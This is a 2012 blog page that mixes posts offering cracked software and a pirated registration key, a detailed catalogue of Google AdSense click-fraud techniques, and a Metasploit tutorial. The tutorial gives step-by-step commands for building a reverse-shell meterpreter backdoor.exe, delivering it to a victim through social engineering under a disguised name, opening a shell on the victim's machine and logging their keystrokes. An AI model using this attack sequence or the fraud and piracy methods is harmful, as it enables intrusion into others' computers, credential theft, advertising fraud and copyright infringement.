Friday, March 30, 2012

Download Adobe Photoshop CS4 Extended Full Version

What is Photoshop Extended?
Adobe Photoshop CS4 Extended software is the ultimate solution for advanced digital imaging, delivering everything in Photoshop CS4 plus breakthrough tools for 3D and motion editing. And now, use it with creativity- and productivity-boosting mobile device apps as they become available.


Installation: When dowload is completed,run the program,wait approximately for 10 minutes, a shortcut icon will appeared on desk-top Enjoy!

Screenshot

How to download Youtube videos using Mozilla Firefox add-ons


picture of a pumpkinHi Guys! Today, i’m going to teach you how to download youtube videos using Mozilla Firefox add-ons.

1) You must have a Mozilla Firefox browser, if you don’t have one you can download the file HERE (after downloading, install it.)

2) Then, go >> HERE << then click “Add to Firefox”, a pop-up window will open, click “install now”

3) After installing the add-on, “Restart the Firefox”, If you don’t know how to restart, just Quit/Close the Firefox then Open it again.

4) Okay, now let’s go to YouTube.com by opening another tab.

5) Search and view the video(s) you want to download, in the upper part of the firefox you will see there an Icon (3 different colored balls), click the drop down button beside it, an FLV file with its corresponsing file name will show, click it again, and a list of options will be available, choose “DOWNLOAD” to start downloading the FLV file. See image >>> HERE

6) After downloading the FLV file, just convert the FLV to mp4, AAC, 3pg, WMV, AVI or any file type you want to have using the Total Video Converter (just browse the this blog for the TVC, it’s full and free to download, ^_^ )

Finished! now you can download any YouTube videos you want! ^_^ Have a nice day!

Ways to cheat Google AdSense


No CheatingFace it. You come to this article probably thinking to find some ways to cheat Google, or to confirm whether some method you have on mind will work. Well, if you want to know how to cheat AdSense, here are the ways, focusing on the AdSense click-frauds. These covers from basic AdSense cheating techniques to the advanced class.

But before you proceed, you might need to know why you shouldn’t cheat Google (answer: you will get caught).

Basic clicker cheat

This is a noob. This guy knows almost nothing about web technology or network architecture. He clicks on his ads every time he has chance. It can be a few clicks to hundreds of clicks daily. Most likely he doesn’t even read the AdSense Program Policies and Terms and Conditions.

Proxy clicker cheat

She knows a thing or two about cookies and IP address. Or she doesn’t know, but somehow guessed that if she use the things called anonymizer, Google will not be able to trace her, because her identity is hidden. She may use anonymizer / proxy websites or specialized anonymous software like tor (The Onion Router).

Multiple computer clicker cheat

He knows that somehow Google will detect if the clicks are originated from his own computer. So he will try to even out origin of the clicks. He will recruit his friends, family members, relatives, neighbors, his cats, and his dogs on single mission: to click on the ads. He will also click on the AdSense ads when he is using the library computers, or his office workstation.

Software clicker cheat

Graduate to the next step is buyers of clickbots / click-bots. These are specialized robot software to click on AdSense ads. It will browse around your websites, clicking on the ads every few minutes. The more advanced ones will cloak the IP address too, so the website seems to be very popular worldwide. To cover the track, this clickbots will browse around the advertisers sites too while continuing its “click quest”.

Paid-clickers cheat

If you don’t like automated things, there is always other option for you. Just pay $50 dollars a month to the professional AdSense clickers. These are groups of highly specialized Internet surfers with office in the dark rooms in street corners of India, Pakistan, and China, helping AdSense account owner to earn good amounts of money ? before the AdSense account is disabled, that is. They will browse around your websites, clicking on the ads every few minutes. Because they use human eyes, they know which ads worth more. And to be more convincing they can click a link or two, or sign up free offers / newsletters on the advertiser sites.

Click-rings cheat

Network is power. So says many business gurus. Instead of taking things to their own hand, this people realize that they can join hands with those with similar goals and distribute AdSense clicks among themselves, the so called AdSense click-rings. Joining this click-ring network means that your website address will be made known to members, who will regularly browse the website and click on your AdSense ads. In exchange, you will also browse other members’ sites and click on their AdSense ads. The medium used varies. Some click-ring groups use mail-list for communications. Some are using bulletin boards/forum, Yahoo groups, or Usenet. IRC is another popular way. Slightly more complicated is specialized AdSense exchange software for collecting members website address and displaying others’ websites for clicking.

Other medium cheat

I have tens of thousands email address on my newsletter subscriber list. If I include AdSense ads on my newsletters, with 5% CTR, I can get a thousand clicks per one email. Not bad. Or I can pay someone to write some useful/nice/funny/cute toolbars or firefox extensions or screensavers that people can download and use for free, and display my AdSense ads there.

Visitor cheat

Simply putting “Visit out sponsors” or “Check out the ads above” on your website is cheating. This might not be very clear-cut cheat to some. But Google AdSense program policies has stated clearly, the only text allowed are “Advertisements” or “Sponsored List”.

Spam cheat

This is the highest level all click-frauds, the Maestro of Fraudsters. She spams millions of emails regularly, offering to “satisfy your inner needs if you can help me check on the links on my website”. Of course, email is not the only way. What IRC and instant messaging (IM) are for, after all. She will look for unsuspecting victims, offering something too-good-to-be-true “if only they will visit the website and click on the links”.

Click-through-rate cheat

Whichever method(s) above used, there is one limiting condition: the CTR(click-though-rate). Any CTR that exceeds certain percentage (probably around 10%) will raise red flag in Google AdSense back room. To lower the CTR, the professional cheaters will create some pages on the same domain that attracts very high traffic. Some interesting freebies will sure do the tricks. AdSense code is pasted there, thus creating a very high page impressions. Whether or not the the ads are clicked does not matter anyway, because they are targeting low paying keyword that does not have much competition. The fake clicks are, of course, on where the big money is, the low traffic pages stuffed with high-paying keywords.

Disclaimer: I don’t say and don’t think that these methods will work. If you even need to read this article, there’s 99% chance you will get caught before you can even get your first paycheck. Your AdSense account will be disabled, and you get banned from ever applying for AdSense account again. =)

Free Total Video Converter 3.70 (Full Version) updated as of JULY 28,2010


mediaAgain, i’m back here in my blog to share something useful to you especially to those people who loves media files. This article is a tutorial on how to convert a TRIAL VERSION of a Video converter software into a FULL VERSION! (That’s right! a full version).

Trial versions are limited in terms of functionality, say like, types of files that it can convert, duration or length of the file it will convert, etc. etc., compared to full versions, the capability of the software is maximized. o’rayt? let’s get it on! ^_^

First, you’ll need to download the trial version of the software - Click here

After downloading the file, Install it. (If you’re in doubt if the download link i’ve given to you has a virus or spyware, i advise you to scan it first, ok? ofcourse, i’m very much sure that this software is clean because i’m already using it.)

When you’re done with the installation, launch/open the software then click ABOUT, after clicking, you’ll see there a “Register” button, Click it then enter (copy and paste) the code below:

89374C95-F9EEBCD2-4ED418A5-BC330E5C-2E174640-0B5F33C2-86CE2F3F-A70F5E46-06B3AE2C-A01CDEBB-DC2101A2-A4AF542E-2B26A701-556F74C4-2AE7723F-81E9484E

Finished! ^_^

Now you have a Full/Registered version of the software. I’ll let you do the exploration regarding the other function of this software aside from converting media since i don’t want to spoil it all for you. ^_^

Enjoy!

Wednesday, March 28, 2012

Install Linux with in Windows

One problem people seem to have with installing Linux is the fact you have to download an .iso, and then burn it to a CD. While burning an .iso to a CD is not hard, unless you are into it, or have done it before, it can be confusing. That is, assuming you have a CD drive, CD burner, and spare CDs. Not to mention with some Windows CD burning programs, it’s not exactly obvious how to properly burn an .iso.To solve this Debian and Ubuntu are now offering a downloadable Windows .exe file that will install Linux while you are running Windows. The Ubuntu one apparently will do all it’s automatic, non-destructive partition magic (meaning it will make your system dual boot with both Windows and Linux without hurting the Windows OS).

The Debian installer can be found on goodbye-microsoft.com, and the Ubuntu one doesn’t seem like it’s ready, but you can read about it on the wiki page.

I don’t see myself using this as I tend to build my own servers (and use Mac on the desktop). However, I can see this being very useful for systems that come with Windows pre-installed and you want Linux instead.

In my experience, a Debian or Ubuntu CD is only used to boot the system anyway. Once a network is found all the software is loaded live over the net via apt-get so this removes the first step being local (and limits some waste). Very cool.

How to find the “real” IP address of a web site?

You can use the PING utility included with Windows to determine the “real” IP address of a web site. Before using this utility, make sure you are not mapping a host name to some IP address with HostName Commander, because if you do, the PING utility will show the address you’ve set up with HostName Commander, instead of the “real” IP address.

To run the PING utility, click on the Windows Start button, and choose Run from the Start Menu. If you use Windows 95,98, or Me, enter “command” (without the quotes) as the command line to run. If you use Windows XP,2000, or NT, enter “cmd” (again, without the quotes). Click OK and the command prompt window should appear on the screen.

Now enter the word “ping” (without the quotes) followed by a space, followed by the host name you want to determine the IP address of, and press Enter:

ping.jpg

In this example, the IP address of the host name www.rkgit.edu.in is74.52.201.2 & IP Address of the host name www.kiet.edu is220.225.19.55 . (Keep in mind that the IP address may change in the future!). If the PING utility reports an error, make sure your computer is connected to the Internet when you are running it.

Tuesday, March 27, 2012

Hack Windows Using Metasploit (Back Track 5) Final.


*********** THE METASPLOIT HACKERS ***********






Note: This is an advance topic. Read Carefully.
Feel free to ask any kind of queries.
AM always here to help you.
===========================================



If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.



Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).


In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.



Hacking through Metasploit is done in 3 simple steps:
Point,
Click,
0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.

Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.

Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.

Payload: Actual code which runs on the compromised system after exploitation

Now, what Metasploit IS?
It is an open source penetration testing framework, used for developing and executing attacks against target systems.
It has a huge database of exploits, also it can be used to write our own 0-day exploits.



METASPLOIT ANTI FORENSICS:
Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult.
They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.


Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI


I recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.


I would recommend you doing the following things in Metasploit, on aBacktrack(system or image), avoiding the windows version of the tool.


For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.


Download Backtrack from HERE. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.




Let the Hacking Begin :

Open up backtrack. You should have a screen similar to this.



The default login credentials are:

Username: root
Pass: toor


Finally, type "startx" to start the GUI mode:
root@bt:~#startx



NOW YOU ARE IN THE DESKTOP AND MAIN SCREEN OF BACKTRACK 5


First of all, know your Local Ip.
Opening up a Terminal (on the bottom Right of taskbar) and typing in:

root@bt:~#ifconfig

It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.

Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole




You should now be having a shell something similar to a command prompt in windows.




msf >

Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Just Type this Command :-
msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP LPORT=”listening port” x > /root/backdoor.exe


Your local IP is the one you noted earlier and for port you could select 4444.
(Everything has to be entered without quotes)


You should get something like this:
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444


After that, you should be able to see a file named as
backdoor.exe in /root or on your Back Tack Desktop.

Send the file to the victim by using your Social Engineering skills and let him


click the file. You can change the name of the file so that it is not that obvious.

Now Open The msf console window of Metasploit
msf >

Type the following:
msf > use exploit/multi/handler


msf exploit(handler) >

set PAYLOAD windows/meterpreter/



reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp


msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444


All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,

msf exploit(handler) > exploit


[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...
Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011



You would see a meterpreter prompt like this

meterpreter >

Type in ps to list the active processes

meterpreter > ps


Search for explorer.exe and migrate to the process
meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.




Type in the following:

meterpreter > use priv

Now, if you want to start the Keylogger activity on victim, just type keyscan_start



Now, if you want to go to the victim’s computer,
Jus type shell

meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>



You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :

C:\Windows\system32>whoami
whoami
win7-pc\win 7
C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:

Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.

Now type in keyscan_dump, to see all the typed keystrokes :

meterpreter > keyscan_dump

Dumping captured keystrokes...



GaM3 0V3R


P.S.: The above information is just for educational purposes only. You should test it against the computer you own